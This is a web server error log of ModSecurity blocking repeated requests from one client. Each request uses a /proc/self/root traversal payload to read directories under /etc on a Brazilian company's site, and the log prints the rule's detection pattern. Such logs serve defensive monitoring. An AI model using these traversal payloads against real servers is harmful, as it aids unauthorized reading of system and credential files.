[Mon Mar 16 16:23:50.286275 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.243.203:52266] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYxaTCbgAP5jq5Teg9swAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:23:56.089117 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.243.203:55764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYzKTCbgAP5jq5Teg9uwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:23:57.403480 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:55768] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYzbysWC90G-1nBrBVjQAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:23:58.689180 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:55784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhYzrysWC90G-1nBrBVkAAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:21.155156 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:55792] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY5Y6lpbStxTqkSkt8qQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:22.409403 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:35928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY5rABkC4fWIHEf8EDQAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:23.739150 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.243.203:35932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY58_BxrYCr4hPDw_8PwAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:24.944048 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:35944] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY6KQpVkWug9HeOt9HpQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:26.259341 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:35946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY6tSswJuvopo3lOhwgAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:27.415770 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.243.203:35962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY60r9dMAiw-8KANNXqAAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:28.623096 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:35972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY7NSswJuvopo3lOhwgQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:29.950990 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:35974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY7bABkC4fWIHEf8EDUgAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:31.271341 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.243.203:44028] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY76TCbgAP5jq5Teg9xQAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:32.503047 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.243.203:44038] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY8KTCbgAP5jq5Teg9xgAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:33.723543 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:44042] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY8bABkC4fWIHEf8EDWQAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:34.987292 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.243.203:44058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY8qTCbgAP5jq5Teg9xwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:36.150494 2026] [:error] [pid 15568:tid 140411565680384] [client 74.7.243.203:44068] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY9KQpVkWug9HeOt9HqAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:37.338188 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.243.203:44076] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY9aTCbgAP5jq5Teg9yQAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:39.641887 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.243.203:44084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY9qQpVkWug9HeOt9HqQAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:43.459432 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:51122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY-7ABkC4fWIHEf8EDbwAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:24:47.021467 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.243.203:51128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhY_8_BxrYCr4hPDw_8RgAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:25:02.620844 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.243.203:51134] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZDlajLEzk2WiQ-10kJAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:25:04.984853 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.243.203:57520] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZEM_BxrYCr4hPDw_8SgAAAcY"], referer: 